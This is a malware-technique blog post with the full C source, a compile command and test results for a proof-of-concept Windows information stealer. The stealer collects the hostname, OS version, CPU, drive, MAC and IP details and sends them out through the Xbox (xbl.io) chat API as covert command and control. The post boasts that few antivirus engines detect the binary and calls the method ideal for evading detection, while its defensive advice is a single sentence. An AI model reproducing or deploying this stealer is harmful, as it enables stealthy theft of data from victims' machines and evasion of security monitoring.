cocomelonc

cybersec enthusiast. mathematician. author. speaker. hacker

5 minute read

Hello, cybersecurity enthusiasts and white hackers!

malware

In my last talk at hack.lu in Luxembourg, I was shown practical examples about using legit APIs for malware C2. As attackers continuously evolve their tactics, using legitimate cloud APIs for covert command and control (C2) channels has become a highly effective and stealthy method of maintaining persistence within a network.

Today, we’ll take a closer look at the Microsoft Xbox API, which is commonly used by gamers but can also be abused by attackers for malware C2 communication.

malware

Honestly, exploiting Microsoft Xbox API - great choice for hiding malicious actions during attacking (and pentesting) gamedev industry.

practical example

As usual, I’ll demonstrate a simple stealer proof of concept (PoC) that sends system information from an infected machine via the Xbox API, mimicking legitimate Xbox Live communication.

Before we get started, you’ll need an Xbox API key, so we need to generate it from dashboard:

malware

malware

malware

So, what is the main idea? The Xbox API, also known as the xbl.io API, allows for communication over Xbox Live, particularly for sending messages between friends. By leveraging the XUID (Xbox User ID) and API key, attackers can send data, including commands and exfiltrated information, directly into Xbox Live chat channels.

We need function like this:

// send data to Xbox chat via xbl.io API
int sendToXbox(const char* message) {
  HINTERNET hSession = WinHttpOpen(L"UserAgent", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
  if (!hSession) return 1;
 
  HINTERNET hConnect = WinHttpConnect(hSession, L"xbl.io", INTERNET_DEFAULT_HTTPS_PORT, 0);
  if (!hConnect) {
    WinHttpCloseHandle(hSession);
    return 1;
  }
 
  HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/api/v2/conversations", NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, WINHTTP_FLAG_SECURE);
  if (!hRequest) {
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
    return 1;
  }

  char authHeader[512];
  snprintf(authHeader, sizeof(authHeader), "X-Authorization: %s", XBOX_TOKEN);

  wchar_t wauthHeader[512];
  wchar_t wctypeHeader[] = L"Content-Type: application/json";
  MultiByteToWideChar(CP_ACP, 0, authHeader, -1, wauthHeader, 512);
 
  WinHttpAddRequestHeaders(hRequest, wauthHeader, -1, WINHTTP_ADDREQ_FLAG_ADD);
  WinHttpAddRequestHeaders(hRequest, wctypeHeader, -1, WINHTTP_ADDREQ_FLAG_ADD);

  char json_body[1024];
  snprintf(json_body, sizeof(json_body), 
    "{\"message\": \"%s\", \"xuid\": \"2535473210914202\"}",
    message);
  
  printf("%s\n", json_body);

  WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, (LPVOID)json_body, strlen(json_body), strlen(json_body), 0);
 
  WinHttpReceiveResponse(hRequest, NULL);

  DWORD bytesRead;
  char buffer[2048];
  while (WinHttpReadData(hRequest, buffer, sizeof(buffer) - 1, &bytesRead) && bytesRead > 0) {
    buffer[bytesRead] = '\0';
    printf("%s", buffer);
  }

  WinHttpCloseHandle(hRequest);
  WinHttpCloseHandle(hConnect);
  WinHttpCloseHandle(hSession);
  return 0;
}

As you can see, nothing new, same pretty simple logic as previous examples from my blog: the system info is sent via the Xbox API as a chat message to a specified Xbox User (XUID).

Full source code looks like this (hack.c):

/*
 * hack.c
 * systeminfo stealer
 * via Xbox friend chat using xbl.io API
 * author @cocomelonc
 * https://cocomelonc.github.io/malware/2025/10/23/malware-trick-53.html
*/

#include <windows.h>
#include <winhttp.h>
#include <iphlpapi.h>
#include <stdio.h>

#define XBOX_TOKEN "598296f2-1cf0-42e9-bdd4-d0c63db1d532"

// send data to Xbox chat via xbl.io API
int sendToXbox(const char* message) {
  HINTERNET hSession = WinHttpOpen(L"UserAgent", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
  if (!hSession) return 1;
 
  HINTERNET hConnect = WinHttpConnect(hSession, L"xbl.io", INTERNET_DEFAULT_HTTPS_PORT, 0);
  if (!hConnect) {
    WinHttpCloseHandle(hSession);
    return 1;
  }
 
  HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/api/v2/conversations", NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, WINHTTP_FLAG_SECURE);
  if (!hRequest) {
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
    return 1;
  }

  char authHeader[512];
  snprintf(authHeader, sizeof(authHeader), "X-Authorization: %s", XBOX_TOKEN);

  wchar_t wauthHeader[512];
  wchar_t wctypeHeader[] = L"Content-Type: application/json";
  MultiByteToWideChar(CP_ACP, 0, authHeader, -1, wauthHeader, 512);
 
  WinHttpAddRequestHeaders(hRequest, wauthHeader, -1, WINHTTP_ADDREQ_FLAG_ADD);
  WinHttpAddRequestHeaders(hRequest, wctypeHeader, -1, WINHTTP_ADDREQ_FLAG_ADD);

  char json_body[1024];
  snprintf(json_body, sizeof(json_body), 
    "{\"message\": \"%s\", \"xuid\": \"2535473210914202\"}",
    message);
  
  printf("%s\n", json_body);

  WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, (LPVOID)json_body, strlen(json_body), strlen(json_body), 0);
 
  WinHttpReceiveResponse(hRequest, NULL);

  DWORD bytesRead;
  char buffer[2048];
  while (WinHttpReadData(hRequest, buffer, sizeof(buffer) - 1, &bytesRead) && bytesRead > 0) {
    buffer[bytesRead] = '\0';
    printf("%s", buffer);
  }

  WinHttpCloseHandle(hRequest);
  WinHttpCloseHandle(hConnect);
  WinHttpCloseHandle(hSession);
  return 0;
}
 
int main() {
  char systemInfo[2048] = {0};
 
  CHAR hostName[MAX_COMPUTERNAME_LENGTH + 1];
  DWORD size = sizeof(hostName);
  GetComputerNameA(hostName, &size);
 
  OSVERSIONINFO osVersion;
  osVersion.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
  GetVersionEx(&osVersion);
 
  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);
 
  DWORD drives = GetLogicalDrives();
 
  IP_ADAPTER_INFO adapterInfo[16];
  DWORD adapterInfoSize = sizeof(adapterInfo);
  GetAdaptersInfo(adapterInfo, &adapterInfoSize);

  // snprintf(systemInfo, sizeof(systemInfo),
  //   "Host: %s , OS: %d.%d.%d",
  //   hostName,
  //   osVersion.dwMajorVersion, osVersion.dwMinorVersion, osVersion.dwBuildNumber);
 
  snprintf(systemInfo, sizeof(systemInfo),
    "Host: %s | OS: %d.%d.%d | Arch: %d | CPU: %d | Drives: %X ",
    hostName,
    osVersion.dwMajorVersion, osVersion.dwMinorVersion, osVersion.dwBuildNumber,
    sysInfo.wProcessorArchitecture,
    sysInfo.dwNumberOfProcessors,
    drives);
 
  for (PIP_ADAPTER_INFO adapter = adapterInfo; adapter != NULL; adapter = adapter->Next) {
    snprintf(systemInfo + strlen(systemInfo), sizeof(systemInfo) - strlen(systemInfo),
     "MAC: %02X-%02X-%02X-%02X-%02X-%02X | IP: %s, ",
     adapter->Address[0], adapter->Address[1], adapter->Address[2],
     adapter->Address[3], adapter->Address[4], adapter->Address[5],
     adapter->IpAddressList.IpAddress.String);
  }

  sendToXbox(systemInfo);
  return 0;
}

This traffic looks like normal communication between friends on Xbox Live, making it invisible to most network monitoring systems, in the future posts I will show the same logic for Linux and Android “victims”.

demo

Let’s go to see this in action. Compile it:

x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -liphlpapi -lwinhttp

malware

Then run it in the victim’s machine (in my case Windows 10 Pro 22H2 x64):

.\hack.exe

malware

As you can see, everything worked as expected! Conversation with systeminfo message is created! =^..^=

Let’s analyze with ANY.RUN:

malware

malware

As you can see, ANY.RUN says that everything is ok: no threats detected.

https://app.any.run/tasks/b6a25f86-94f2-42d8-930e-cbc5fdc1438b

Let’s analyse with VirusTotal:

malware

As you can see, only 3 of of 72 AV engines detect our file as malicious.

Then, VirusTotal says:

The binary is an information stealer. It collects detailed system information including hostname, OS version, architecture, MAC address, and logical drives. This data is formatted into a JSON payload and exfiltrated via an HTTPS POST request to the hardcoded domain xbl.io on port 443. The C2 communication uses a hardcoded authorization token (598296f2-1cf0-42e9-bdd4-d0c63db1d532) and a specific API endpoint (/api/v2/conversations).

malware

https://www.virustotal.com/gui/file/1ef2aa819e755b19a66de169db15f6aa6df2687e366dda7557fda80156fbfe60/detection

The Xbox API is not typically associated with malware or C2 traffic, making it ideal for evading detection by standard security tools.

Leveraging Microsoft XBOX API for C2 is ideal for Red Team engagements with Game Development companies/clients.

To defend against abuse of services like the Xbox API, network defenders can monitor API Usage, regularly check for unusual API calls to Xbox, especially from unexpected machines or user accounts.

I hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red teamers arsenal.

malware

Thanks to ANY.RUN for API!

ATT&CK MITRE: T1102
ANY.RUN
ANY.RUN: hack.exe
VirusTotal: hack.exe
BitBucket API Stealer
Github API stealer
VirusTotal API stealer
Telegram Bot API stealer
source code in Github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

You may also enjoy